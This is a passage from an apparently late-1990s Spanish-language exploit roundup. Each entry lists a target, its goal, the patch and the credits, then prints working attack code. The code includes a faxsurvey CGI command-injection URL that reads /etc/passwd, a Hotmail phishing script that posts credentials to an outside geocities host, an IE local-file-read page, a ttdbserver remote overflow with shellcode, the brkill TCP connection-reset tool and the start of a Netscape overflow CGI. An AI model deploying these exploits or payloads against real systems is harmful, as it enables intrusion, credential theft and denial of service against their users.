              Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux. 
Codigo:       http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Linux RedHat 5.1
Objetivo:     DoS
Parche:       ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-5.1/linuxconf-1.11r19-1.i386.rpm
Creditos:     Alex Mottram
Descripcion:  Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386 si lo
              actualizas desde el FTP de RedHAT.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: HOTMAIL
Objetivo:     Obtener las claves de los usuarios
Parche:       Descativar Java
Creditos:     Tom Cervenka
Descripcion:  Mediante al ejecucion de un codigo en java malicioso al leer
              los mensajes con el navegador que estemos usando, que fuerza
              al usuario a volver a registrarse e introducir de nuevo su
              cuenta y su contrasea, sin saber que en realidad esta mandando
              al atacante estos datos.
Codigo:
                         <html><head></head><body>
                         <p>"Go where you want today" - Blue Adept</p>
                         <script>
                         function getmess(){
                         return "<table border=0 cellpadding=5 cellspacing=5 width=508
                         height=90%>" +
                         "<tr valign=middle>" +
                         "<th colspan=2>" +
                         "<font face=\"Arial, Helvetica\" size=\"5\">" +
                         "We're Sorry, We Cannot<br>Process Your Request" +
                         "</font></th></tr>" +
                         "<tr valign=middle><td align=center>" +
                         "<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
                         "<font face=\"Arial, Helvetica\" size=\"3\"
                         color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>"
                         +
                         "<font face=\"Arial, Helvetica\" size=\"2\"><a
                         href=\"http://www.hotmail.com/errormsg.html\">(Get more info
                         regarding error messages here)</a></font>" +
                         "</td></tr>" +
                         "<tr valign=\"middle\"><td align=\"center\">" +
                         "<FORM METHOD=POST
                         ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
                         target=\"_top\">" +
                         "<INPUT TYPE=\"hidden\" NAME=\"next-url\"
                         VALUE=\"http://www.hotmail.com\">" +
                         "<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
                         Password\">" +
                         "<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
                         "<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login
                         Name:</font><br><input type=\"text\" name=\"login\" size=\"16\"
                         maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\"
                         size=\"2\">Password:</font><br><input type=\"password\"
                         name=\"passwd\" size=\"16\" maxlength=\"16\"> <input
                         type=\"submit\" value=\"Enter\"></td><tr>" +
                         "</table></form></td></tr>" +
                         "<tr valign=middle><th colspan=2 align=center>" +
                         "<font face=\"Arial, Helvetica\" size=\"3\">" +
                         "Return to <a href=\"http://welcome.to/www.hotmail.com\"
                         target=\"_parent\">Hotmail's Homepage</a>." +
                         "</font></th></tr></table>" +
                         "<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16
                         border=0 alt=\"Copyright 1996-1997\">";
                         }
                         
                         nomenulinks=top.submenu.document.links.length;
                         for(i=0;i<nomenulinks-1;i++){
                         top.submenu.document.links[i].target="work";
                         top.submenu.document.links[i].href="javascript:getmess()";
                         }
                         
                         noworklinks=top.work.document.links.length;
                         for(i=0;i<noworklinks-1;i++){
                         top.work.document.links[i].target="work";
                         top.work.document.links[i].href="javascript:getmess()";
                         }
                         
                         </script>
                         </body>
                         </html>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Win98
Objetivo:     Efecto 2000
Parche:       No encender el ordenador en Noche Vieja
Creditos:     -
Descripcion:  El bug aparece cuando Windows 98 es reiniciado entre las 23:59
              y las 00:00 y hace que el ordenador salte uno o dos dias hacia
              atras, de pendiendo de la hora exacta de reset. Por ahora esto
              solo ocuure el 31 de Diciembre.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa:  Internet Explorer 
Objetivo:      Leer ficheros locales
Parche:        http://www.microsoft.com/security/bulletins/ms98-013.htm
Creditos:      Georgi Guninski
Descripcion:   Esta nueva vulnerabilidad permite a una pagian Web diseada
               maliciosamente leer archivos de texto o html del ordenador del
               usuario y enviar sus contenidos a un host arbitrario, incluso
               cuando el usuario se encuentra detras de un firewall. El
               agujero explota un error de seguridad en los frames y se basa
               en la utilizacion de instrucciones en JavaScript. Para que
               funcione se debe conocer de antemano el nombre y camino
               completo del fichero que se quiere leer, cosa nomuy dificil.

               Versiones afectadas:
               - Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre
                 Windows NT 4.0, Windows 95
               - Microsoft Windows 98, Internet Explorer iontegrado
                 (version 4.01 SP1)
               - Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1
                 y Windows NT 3.51
               - Microsoft Internet Explorer 4.0 y 4.01 para Macintosh
               - Microsoft Internet Explorer 3.x
Codigo:

<HTML>
<HEAD><TITLE>Read text/HTML file with Internet Explorer
4.01></TITLE></HEAD>
<BODY>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
<B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
<BR>
To test it, you need Javascript enabled.
<BR>
This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>

<SCRIPT LANGUAGE="JAVASCRIPT">
alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)");
var x=window.open('file://C:/test.txt');
x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\"
)
");
</SCRIPT>
</BODY>
</HTML>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Linux RedHat 5.1
Objetivo:     Matar cualquier proceso
Parche:       Nuevo kernel
Creditos:     Ryan Dibble <dibbler@umd.umich.edu>
Descripcion:  El codigo de abajo puede matar cualquier proceso. No puede matar
              init,  kflushd,  kswapd,  ni klogd. Testeado en maquinas con los
              siguientes paquetes:       
                        kernel-2.0.34-0.6
                        glibc-2.0.7-13
                        glib-1.0.1-2
                        glibc-debug-2.0.7-13
                        glibc-devel-2.0.7-13
                        glibc-profile-2.0.7-13
Codigo:  

===== BEGIN shits.c =====
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;
  if (argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}
===== END shits.c =====
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Solaris (testeado en  SS5 y Ultra 2.5.1), Irix (testeado  en r5k
                y r10k O2 6.3), HP-UX (testeado en 700s 10.20)
Objetivo:     Overflow remoto
Parche:       ???
Creditos:     Anonimo
Descripcion:  Usar: ./r [-ku] [-p puerto] [-f fichero de salida] host cmd
           -k : mata ttdbserver
           -u : usar UDP (opr defecto TCP)
           -p port : conectar con el ttdbserver en elpuerto
           -f outfile : almacena  mesaje  rpc  en  un  fichero  de texto (y no
                                                         contacta con el host)
           -a : agitar antes de usar
Codigo:

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>

#define PORT 0
#define BSIZE 1024

#if defined(SOLARIS)
# define SP 0xefffd618
# define LENOFS 80
char asmcode[]="\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x92\x03\xe0\x48\x90\x02\x60\x10\xe0\x02\x3f\xf0\xa2\x80\x3f\xff\xa0\x24\x40\x10\xd0\x22\x3f\xf0\xc0\x22\x3f\xfc\xa2\x02\x20\x09\xc0\x2c\x7f\xff\xe2\x22\x3f\xf4\xa2\x04\x60\x03\xc0\x2c\x7f\xff\xe2\x22\x3f\xf8\xa2\x04\x40\x10\xc0\x2c\x7f\xff\x82\x10\x20\x0b\x91\xd0\x20\x08\xff\xff\xff\xfc\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x80\x1c\x40\x11";
#endif

#if defined(HPUX)
# define SP 0x7b03cc10
# define LENOFS 84
char asmcode[]="\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x0b\x39\x02\x80";
#endif

#if defined(IRIX)
# define SP 0x7fff1b30
# define LENOFS 76
char asmcode[]="\x04\x10\xff\xff\x27\xe4\x01\x01\x24\x84\xff\x5e\x8c\x8c\xff\xe5\x24\x0d\xff\xff\x01\xac\x60\x23\x01\x84\x60\x20\xa1\x80\xff\xff\xa0\x80\xff\xff\xac\x84\xff\xed\x24\x84\xff\xfd\xa0\x80\xff\xff\xac\x84\xff\xec\x24\x84\xff\xf8\x24\x85\xff\xf0\xac\x84\xff\xf0\xac\x80\xff\xfc\x24\x02\x03\xf3\x02\x04\x8d\x0c\xff\xff\xff\xfc\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x24\x0f\x12\x34";

#endif

#define TT_DBSERVER_PROG 100083
#define TT_DBSERVER_VERS 1
#define _TT_P 7

struct tt_reply {
  int i1;
  int i2;
};

void usage(char *s) {
  printf("Usage: %s [-ku] [-p port] [-f outfile] host cmd\n", s);
  exit(0);
}

bool_t xdr_tt_reply(XDR *xdrs, struct tt_reply *objp) {

  if (!xdr_int(xdrs, &objp->i1))
    return (FALSE);
  if (!xdr_int(xdrs, &objp->i2)) 
    return (FALSE);
  return (TRUE);
}

void make_file(char *fname, char *buf, int type);

main(int argc, char *argv[]) {
  extern int optind;
  extern char *optarg;
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct hostent *hp;
  struct sockaddr_in target;
  struct tt_reply op_res;
  char buf[64000], *path, *cmd, *host, *bp, *outfile = NULL;
  int sd, i, sp = SP, bsize = BSIZE, port = PORT, kill = 0, proto = 0;

  while ((i = getopt(argc, argv, "ukp:f:")) != EOF)
    switch (i) {
      case 'p':
        port = atoi(optarg);
        break;
      case 'k':
        kill = 1;
        break;
      case 'u':
        proto = 1;
        break;
      case 'f':
        outfile = optarg;
        break;
      default:
        usage(argv[0]);
    }
  if (argc - optind < 2)
    usage(argv[0]);
  cmd = argv[optind + 1];
  host = argv[optind];

  for (i = 0; i < sizeof(buf); i++)
    *(buf + i) = NOP[i % 4];

  i = bsize - strlen(asmcode) - strlen(cmd);
  i &= 0xfffffffc;
  strcpy(buf + i, asmcode);
  strcat(buf, cmd);
  *(int *)(buf + i + LENOFS) = ~(strlen(cmd) + 1);
  buf[strlen(buf)] = '.';
  bp = buf + bsize;
  for (i = 0; i < 16; bp+=4, i++)
    *(int *)bp = sp;
#ifdef IRIX
  sp = sp + 400 + 31652;
  for (i = 0; i < 5000; bp+=4, i++)
    *(int *)bp = sp;
  *bp++ = '/';
  *bp++ = 'f';
  path = buf + 2;
#else
  path = buf;
#endif
  *bp = 0;

  if (outfile) {
    make_file(outfile, buf, proto);
    printf("rpc datagram stored in %s\n", outfile);
    exit(0);
  }

  if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
    if ((hp = gethostbyname(host)) == NULL) {
      printf("%s: cannot resolve\n", host);
      exit(1); 
    } else
      target.sin_addr.s_addr = *(u_long *)hp->h_addr;
  }
  target.sin_family = AF_INET;
  target.sin_port = htons(port);
  sd = RPC_ANYSOCK;

  tm.tv_sec = 4;
  tm.tv_usec = 0;
  if (proto) 
    cl = clntudp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, tm, &sd);
  else
    cl = clnttcp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, &sd, 0, 0);
  if (cl == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
  tm.tv_sec = 10;

  if (kill) {
    path = NULL;
    bp = NULL;
    if ((stat = clnt_call(cl, 15, xdr_wrapstring, (char *)&path, 
        xdr_wrapstring, (char *)&bp, tm)) != RPC_SUCCESS) {
      clnt_perror(cl, "clnt_call");
      exit(1);
    }
    printf("Could not kill ttdbserver, reply is: %s\n", bp);
    exit(1);
  }

  if ((stat = clnt_call(cl, _TT_P, xdr_wrapstring, (char *)&path, xdr_tt_reply, 
       (char *)&op_res, tm)) != RPC_SUCCESS) {
    clnt_perror(cl, "clnt_call");
    exit(1);
  }
  printf("res i1 %d, res i2 %d\n", op_res.i1, op_res.i2);
  clnt_destroy(cl);
}

void make_file(char *fname, char *buf, int type) {
  int fd, offs;
  XDR xdrm;
  struct rpc_msg rpc_hdr;
  struct authunix_parms aup;
  char dgram[64000], rauth[MAX_AUTH_BYTES];

  if (type == 1) /* UDP */
    offs = 4;
  if ((fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) {
    perror(fname);
    exit(1);
  }
  xdrmem_create(&xdrm, rauth, sizeof(rauth), XDR_ENCODE);
  aup.aup_time = (u_long)time(NULL);
  aup.aup_machname = "localhost";
  aup.aup_uid = 0;
  aup.aup_gid = 0;
  aup.aup_len = 0;
  aup.aup_gids = NULL;
  if (xdr_authunix_parms(&xdrm, &aup) == FALSE) {
    printf("error encoding auth cred\n");
    exit(1);
  }
  rpc_hdr.rm_call.cb_cred.oa_length = xdr_getpos(&xdrm);
  xdr_destroy(&xdrm);
  xdrmem_create(&xdrm, dgram + 4, sizeof(dgram), XDR_ENCODE);
  rpc_hdr.rm_xid = 0x12345678;
  rpc_hdr.rm_direction = CALL;
  rpc_hdr.rm_call.cb_rpcvers = 2;
  rpc_hdr.rm_call.cb_prog = TT_DBSERVER_PROG;
  rpc_hdr.rm_call.cb_vers = TT_DBSERVER_VERS;
  rpc_hdr.rm_call.cb_proc = _TT_P;
  rpc_hdr.rm_call.cb_cred.oa_flavor = AUTH_UNIX;
  rpc_hdr.rm_call.cb_cred.oa_base = rauth;
  rpc_hdr.rm_call.cb_verf.oa_flavor = AUTH_NONE;
  rpc_hdr.rm_call.cb_verf.oa_base = NULL;
  rpc_hdr.rm_call.cb_verf.oa_length = 0;
  if (xdr_callmsg(&xdrm, &rpc_hdr) == FALSE) {
    printf("error encoding rpc header\n");
    exit(1);
  }
  if (xdr_wrapstring(&xdrm, &buf) == FALSE) {
    printf("error encoding rpc data\n");
    exit(1);
  }
  /* record marking */
  *(u_int *)dgram = 0x80000000 | xdr_getpos(&xdrm);
  if (write(fd, dgram + offs, xdr_getpos(&xdrm) + 4) == -1) {
    perror("write");
    exit(1);
  }
  xdr_destroy(&xdrm);
  close(fd);
}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Win 95, Win/NT
Objetivo:     Resetear conexiones TCP/IP
Parche:       "Thanks, we'll look into it" (Palabras  de  Microsoft  cuando le
                comunicaron el bug).
Creditos:     Basement Research <br@DEEPTHOUGHT.EE.SIUE.EDU>
Descripcion:  Conociendo la IP de la victima y el puerto TCP, se puede aprove-
              char  de un fallo  en la implementacion del protocolo TCP/IP por
              parte de Microsoft, resetear esta conexion.
Codigo:
/* brkill.c
 * by the basement research, llp
 * Sat Sep  5 04:01:11 CDT 1998
 * For the details of how this works, you can visit http://deep.ee.siue.edu/br.
 * To compile: 
 * cc -O2 -o brkill brkill.c -lpcap 
 */

#define SWAP(a,b) { a^=b; b^=a; a^=b; }
#define _BSD_SOURCE	1
#ifdef __FreeBSD__
#define BSDFIX(a) (a)
#else
#define BSDFIX(a) htons(a)
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/utsname.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include "pcap.h"

#define TIMEOUT_VALUE	500
#define VICTIM_START_PORT	1023

struct evilpkt
  {
    struct ip iphdr;
    struct tcphdr tcphead;
  }
pkt;

struct fakehdr
  {
    u_long saddr;
    u_long daddr;
    u_char zero;
    u_char proto;
    u_short len;
    struct tcphdr faketcp;
  }
pseudo;

static pcap_t *pfd;
u_long victim;
u_short port;
char *device = NULL;
u_short link_offset = 14;
static char *filter_str;
struct pcap_pkthdr hdr;

u_short
tcp_cksum (u_short * tcphdr, int len)
{
  register long sum = 0;
  u_short *w = tcphdr;
  static u_short answer = 0;

  while (len > 1)
    {
      sum += *w++;
      len -= 2;
    }
  if (len == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return (~sum);
}

void
start_pcap ()
{
  char cmd[200];
  int psize ;
  struct bpf_program fcode;
  u_int localnet, netmask;
  char errbuf[PCAP_ERRBUF_SIZE];
  char dialup[] = "ppp0";
  psize = 300;


  if (device == NULL)
    {
      if ((device = pcap_lookupdev (errbuf)) == NULL)
	{
	  printf ("pcap_lookupdev : %s\n", errbuf);
	  exit (-1);
	}
    }
  printf ("Selected network device: %s\n", device);
  if (!strcmp (device, dialup))
    {
      link_offset = 0;
    }
  if ((pfd = pcap_open_live (device, psize, IFF_PROMISC, TIMEOUT_VALUE, errbuf))
      == NULL)
    {
      printf ("pcap_open_live : %s\n", errbuf);
      exit (-1);
    }
  if (pcap_lookupnet (device, &localnet, &netmask, errbuf) < 0)
    {
      printf ("pcap_lookupnet : %s\n", errbuf);
      exit (-1);
    }
  snprintf (cmd, sizeof (cmd), filter_str);
  printf ("Setting filter : %s\n", filter_str);
  if (pcap_compile (pfd, &fcode, cmd, IFF_PROMISC, netmask) < 0)
    {
      printf ("pcap_compile : %s\n", pcap_geterr (pfd));
      exit (-1);
    }
  if (pcap_setfilter (pfd, &fcode) < 0)
    {
      printf ("pcap_setfilter : %s\n", pcap_geterr (pfd));
      exit (-1);
    }
  if (pcap_datalink (pfd) < 0)
    {
      printf ("pcap_datalink : %s\n", pcap_geterr (pfd));
      exit (-1);
    }
}

u_long
extract_ack (char *pkt)
{
  u_long extracted;
  u_long last_ack = 0;

  bcopy ((u_long *) (pkt + 28), &extracted, sizeof (u_long));
  last_ack = ntohl (extracted);
  if (last_ack == 0)
    {
      puts ("This machine returns a last ACK of 0.  Cannot reset.");
      exit (-1);
    }
  printf ("Last ACK # sent by the victim is %lu (%#lx).\n", last_ack, last_ack);
  return (last_ack);
}

u_long
grab_pcap ()
{
  char *pptr = NULL;
  u_long last_ack;

  while ((pptr = (char *) pcap_next (pfd, &hdr)) == NULL);
  pptr = pptr + link_offset;
  last_ack = extract_ack (pptr);
  return (last_ack);
}

void
init_pkt (u_long dest, u_long src, u_short port)
{
  size_t pktlen;

  pktlen = sizeof (struct ip) + sizeof (struct tcphdr);
  bzero (&pkt, 40);
  bzero (&pseudo, 32);
  pkt.iphdr.ip_hl = 0x5;
  pkt.iphdr.ip_v = IPVERSION;
  pkt.iphdr.ip_tos = 0x0;
  pkt.iphdr.ip_len = pktlen;
  pkt.iphdr.ip_id = htons (0x29a + (u_short) rand () % 7000);
  pkt.iphdr.ip_off = BSDFIX (IP_DF);
  pkt.iphdr.ip_ttl = 255;
  pkt.iphdr.ip_p = IPPROTO_TCP;
  pkt.iphdr.ip_src.s_addr = src;
  pkt.iphdr.ip_dst.s_addr = dest;
  pkt.iphdr.ip_sum = htons (tcp_cksum ((u_short *) & pkt.iphdr, 20));
  pkt.tcphead.th_sport = htons (rand () % 5000 + 1024);
  pkt.tcphead.th_dport = htons (port);
  pkt.tcphead.th_seq = 0;
  pkt.tcphead.th_ack = 0;
  pkt.tcphead.th_x2 = 0;
  pkt.tcphead.th_off = 0x5;
  pkt.tcphead.th_flags = TH_ACK + TH_PUSH;	/* Use user-supplied argument */
  pkt.tcphead.th_win = htons (0x800);
  pkt.tcphead.th_urp = 0;
  /* Now init the pseudoheader we need to calculate the TCP checksum */
  pseudo.saddr = src;
  pseudo.daddr = dest;
  pseudo.zero = 0;
  pseudo.proto = IPPROTO_TCP;
  pseudo.len = htons (0x14);	/* Refers to ONLY the TCP header plus any options */
  bcopy (&pkt.tcphead, &pseudo.faketcp, 20);
  pkt.tcphead.th_sum = tcp_cksum ((u_short *) & pseudo, 32);
}

int
open_sock ()
/* Open up a socket and return the resulting file descriptor. */
{
  int sockfd;
  const int bs = 1;

  if ((sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    {
      perror ("open_sock():socket()");
      exit (-1);
    }
  if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (char *) &bs, sizeof (bs)) < 0)
    {
      perror ("open_sock():setsockopt()");
      close (sockfd);
      exit (-1);
    }
  return (sockfd);
}

struct sockaddr_in *
set_sockaddr (u_long daddr, u_short port)
/* Set up target socket address and return pointer to sockaddr_in structure. */
{
  struct sockaddr_in *dest_sockaddr;
  dest_sockaddr = (struct sockaddr_in *) malloc (sizeof (struct sockaddr_in));

  bzero (dest_sockaddr, sizeof (struct sockaddr_in));
  dest_sockaddr->sin_family = AF_INET;
  dest_sockaddr->sin_port = htons (port);
  dest_sockaddr->sin_addr.s_addr = daddr;
  return (dest_sockaddr);
}

u_long
host_to_ip (char *host_name)
{
  struct hostent *target;
  u_long *resolved_ip;
  resolved_ip = (u_long *) malloc (sizeof (u_long));

  if ((target = gethostbyname (host_name)) == NULL)
    {
      fprintf (stderr, "host_to_ip: %d\n", h_errno);
      exit (-1);
    }
  else
    {
      bcopy (target->h_addr, resolved_ip, sizeof (struct in_addr));
      return ((u_long) * resolved_ip);
    }
}

char *
set_filter (char *destip, char *srcip, char *dport)
{
  static char *filt;

  filt = (char *) malloc (strlen (destip) + strlen (srcip) + strlen (dport) + 39);
  filt[0] = '\0';
  strcat (filt, "src host ");
  strcat (filt, destip);
  strcat (filt, " and dst host ");
  strcat (filt, srcip);
  strcat (filt, " and src port ");
  strcat (filt, dport);
  return (filt);
}

u_long
get_ack (u_long victim, u_long saddr, u_short port, int fd, struct sockaddr_in * sock, int delay)
{
  size_t psize;
  u_long last_ack;

  psize = sizeof (struct evilpkt);
  init_pkt (victim, saddr, port);
  sleep (delay);
  if (sendto (fd, (const void *) &pkt, psize, 0, (const struct sockaddr *) sock, sizeof (struct sockaddr)) < 0)
    {
      perror ("sendto()");
      close (fd);
      exit (-1);
    }
  last_ack = grab_pcap ();
  return (last_ack);
}

void
usage ()
{
  puts ("brkill - by basement research, 9/30/98\n");
  puts ("Usage: brkill [-d device] [-s source IP addr]");
  puts ("\t [-t time to pause between get_acks (default=1 sec)]");
  puts ("\t [-l server low port or single port if not using range (default=6660)]");
  puts ("\t [-h server high port or single port if not using range (default=6670)]");
  puts ("\t [-v # of victim ports to target (starting at 1023, default=50)]");
  puts ("\t [-n # of times to increment seq # by 1 for each port combo (default=0)]");
  puts ("\t <victim addr> <victim's server> <dest port for ack retrieval>");
  exit (0);
}

int
main (int argc, char **argv)
{
  int fd, i, sp, opt, delay = 1, vichighport, vicports = 50, highseq = 0;
  u_short ircport, slowport = 0, shighport = 0;
  char *source = NULL;
  struct sockaddr_in *sock;
  u_long saddr, server;
  size_t psize;
  register u_long last_ack;
  struct hostent *hptr;
  struct utsname localname;

  if ((argc > 18) || (argc < 4))
    {
      usage ();
    }

  while ((opt = getopt (argc, argv, "d:s:t:l:h:v:n:")) != -1)
    {
      switch (opt)
	{
	case 'd':
	  device = optarg;
	  break;
	case 's':
	  source = optarg;
	  saddr = host_to_ip (source);
	  break;
	case 'p':
	  delay = atoi (optarg);
	  break;
	case 'l':
	  slowport = atoi (optarg);
	  break;
	case 'h':
	  shighport = atoi (optarg);
	  break;
	case 'v':
	  vicports = atoi (optarg);
	  break;
    	case 'n':
  	  highseq = atoi (optarg);
   	  break;
	case '?':
	  puts ("Unknown option.");
	  exit (-1);
	}
    }

/* Try to determine source IP address if its not provided */
  if (source == NULL)
    {
      if (uname (&localname) < 0)
	{
	  perror ("uname(): ");
	  exit (-1);
	}
      if ((hptr = gethostbyname (localname.nodename)) == NULL)
	{
	  perror ("gethostbyname(): ");
	  exit (-1);
	}
      source = hptr->h_name;
      bcopy (hptr->h_addr, &saddr, sizeof (struct in_addr));
      printf ("Using a source address of %s\n", inet_ntoa (saddr));
    }

/* These next two if conditionals deal with the situation where only -l or
 * -h are specified.  In these cases, we will only target the specified port.
 */
  if ((slowport > 0) && (shighport == 0))
    {
      shighport = slowport;
    }
  if ((shighport > 0) && (slowport == 0))
    {
      slowport = shighport;
    }

/* If the low server port is bigger than the high server port, then the user
 * doesn't know what they are doing.  In this case, we'll swap the values.
 */
  if (slowport > shighport)
    {
      SWAP (slowport, shighport);
      puts ("Warning: low port is greater than high port - swapping the two...");
    }

/* Defaults if neither -l nor -h are specified (common IRC server ports). */
  if ((slowport == 0) && (shighport == 0))
    {
      slowport = 6660;
      shighport = 6670;
    }
/* End of the options processing code */

  vichighport = VICTIM_START_PORT + vicports;
  ircport = shighport;
  filter_str = set_filter (argv[optind], source, argv[optind + 2]);
  victim = host_to_ip (argv[optind]);
  server = host_to_ip (argv[optind + 1]);
  port = (u_short) atoi (argv[optind + 2]);
  sock = set_sockaddr (victim, port);
  fd = open_sock ();
  psize = sizeof (struct evilpkt);
  start_pcap ();
  while (1)
    {
      last_ack = get_ack (victim, saddr, port, fd, sock, delay);
      pkt.iphdr.ip_src.s_addr = server;
      pkt.iphdr.ip_dst.s_addr = victim;
      pkt.iphdr.ip_id = htons (rand () % 7000);
      pkt.iphdr.ip_off = 0;
      pkt.tcphead.th_flags = TH_RST;
      pkt.tcphead.th_win = 0;
      pkt.tcphead.th_ack = 0;
      pseudo.saddr = server;
      pseudo.daddr = victim;
      if (ircport >= slowport)
	{
	  pkt.tcphead.th_sport = htons (ircport);
	}
      else
	{
	  ircport = shighport;
	  pkt.tcphead.th_sport = htons (ircport);
	}
      printf ("Setting the source port to %d.\n", ircport);
      ircport--;
      for (i = 0; i <= highseq; i++)
	{
	  pkt.tcphead.th_seq = htonl (last_ack + i);
	  bcopy (&pkt.tcphead, &pseudo.faketcp, 20);
	  for (sp = VICTIM_START_PORT; sp < vichighport; sp++)
	    {
/* FreeBSD has problems and runs out of buffer space in sendto() unless
   we insert a delay here.  Unfoprtunately, this makes the code less
   effective. */
#ifdef __FreeBSD__
	      if (!(sp % 20))
		{
		  usleep (20000);
		}
#endif
	      pkt.tcphead.th_dport = htons (sp);
	      bcopy (&pkt.tcphead.th_dport, &pseudo.faketcp.th_dport, 2);
	      pkt.iphdr.ip_id = htons (0x29a + (u_short) rand () % 7000);
	      pkt.iphdr.ip_sum = 0;
	      pkt.iphdr.ip_sum = htons (tcp_cksum ((u_short *) & pkt.iphdr, 20));
	      pseudo.faketcp.th_sum = 0;
	      pkt.tcphead.th_sum = tcp_cksum ((u_short *) & pseudo, 32);
	      if (sendto (fd, (const void *) &pkt, psize, 0, (const struct sockaddr *) sock, sizeof (struct sockaddr)) < 0)
		{
		  perror ("sendto(): ");
		  close (fd);
		  exit (-1);
		}
	    }
	}
    }
  if (close (fd) == -1)
    {
      perror ("close()");
      exit (-1);
    }
  return (0);
}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Netscape en x86 Linux
Objetivo:     Buffer overflow
Parche:       Cuidado con lo que ves
Creditos:     Mr. Nothing <nothing@shout.net>
Descripcion:  El buffer overflow puede ser activado remotamente por el CGI.
Codigo:       
#!/usr/bin/perl
#
# buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19

sub parse {
  join("", map { /^[0-9A-Fa-f]{2}$/ ? pack("c", hex($_)) : "" } @_);
}

# This is very tricky business.  Netscape maps unprintable characters
# (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine
# code must be free of these characters.  This makes it impossible
# to call int 0x80, so I put int 0x40 there and wrote code to
# shift those bytes left before it gets called.  Also null characters
# can't be used because of C string conventions.

# the first paragraph of the following turns the int 0x40 in the second
# paragraph into int 0x80.  the second paragraph nullifies the SIGALRM
# handler.

my $pre = parse qw{
